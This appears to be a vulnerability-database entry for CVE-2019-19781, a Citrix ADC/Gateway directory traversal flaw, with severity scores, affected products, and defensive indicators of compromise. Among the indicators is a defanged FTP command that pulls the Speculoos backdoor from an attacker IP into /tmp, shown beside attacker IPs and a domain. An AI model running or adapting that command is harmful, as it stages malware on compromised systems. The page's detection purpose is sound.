cbcvebase.
CVE-2019-19781
published 2019-12-27

CVE-2019-19781: An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.

PriorityP197critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2022-05-03
Exploited in the wild
EPSS
100.00%
100.0th percentile
An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.

Affected

17 ranges
VendorProductVersion rangeFixed in
citrixapplication_delivery_controller_firmware
citrixapplication_delivery_controller_firmware
citrixapplication_delivery_controller_firmware
citrixapplication_delivery_controller_firmware
citrixapplication_delivery_controller_firmware
citrixcitrix_adm
citrixcitrix_hypervisor
citrixcitrix_virtual_apps_and_desktops
citrixendpoint_management
citrixgateway_firmware
citrixnetscaler_adc
citrixnetscaler_gateway
citrixnetscaler_gateway_firmware
citrixnetscaler_gateway_firmware
citrixnetscaler_gateway_firmware
citrixnetscaler_gateway_firmware
citrixxenserver

Detection & IOCsextracted from sources · hover to see the quote

ip66.42.98.220
domainalibaba.zzux.com
ip119.28.139.120
ip119.28.139.20
filenamebsd
path/tmp/bsd
command/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]@66.42.98[.]220/
bytes
16 03 01 00 B5 01 00 00 B1 03 01 00 00 00 00 00 00 00 00 00 00 6A CE 14 27 3F 24 92 AB 0A A3 F7 DB 21 1C D6 7F FD E3 A3 50 00 00 00 00 48 C0 0A C0 14 00 88 00 87 00 39 00 38 C0 0F C0 05 00 84 00 35 C0 07 C0 09 C0 11 C0 13 00 45 00 44 00 66 00 33 00 32 C0 0C C0 0E C0 02 C0 04 00 96 00 41 00 04 00 05 00 2F C0 08 C0 12 00 16 00 13 C0 0D C0 03 FE FF 00 0A 02 01 00 00 3F 00 00 00 13 00 11 00 00 0E 6C 6F 67 69 6E 2E 6C 69 76 65 2E 63 6F 6D FF 01 00 01 00 00 0A 00 08 00 06 00 17 00 18 00 19 00 0B 00 02 01 00 00 23 00 00 33 74 00 00 00 05 00 05 01 00 00 00 00
snort
52620
  • Speculoos backdoor sends a hardcoded TLS Client Hello packet with SNI set to 'login.live.com' as a masquerade; detect anomalous TLS connections to non-Microsoft IPs using this SNI value
  • Monitor Citrix ADC/Gateway devices for outbound FTP connections, especially to unknown IPs, dropping ELF/FreeBSD binaries to /tmp — indicative of CVE-2019-19781 post-exploitation payload staging
  • Speculoos is an ELF executable compiled for FreeBSD (GCC 4.2.1); detection of unexpected FreeBSD ELF binaries on Citrix ADC appliances is a strong indicator of compromise
  • CVE-2019-19781 exploitation is detectable via HTTP path traversal patterns in requests to Citrix ADC/Gateway; monitor for directory traversal sequences in HTTP/S requests to these devices
  • ·CVE-2019-19781 was first disclosed on December 17, 2019 via security bulletin CTX267679 with mitigations only; permanent patches were not issued until January 24, 2020, leaving a significant exploitation window
  • ·Speculoos does not natively maintain persistence; a separate component or additional adversary step is required to maintain the foothold on compromised Citrix appliances
  • ·CVE-2019-19781 affects Citrix ADC, Gateway, and SD-WAN WANOP appliances; all three product lines should be assessed and patched

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.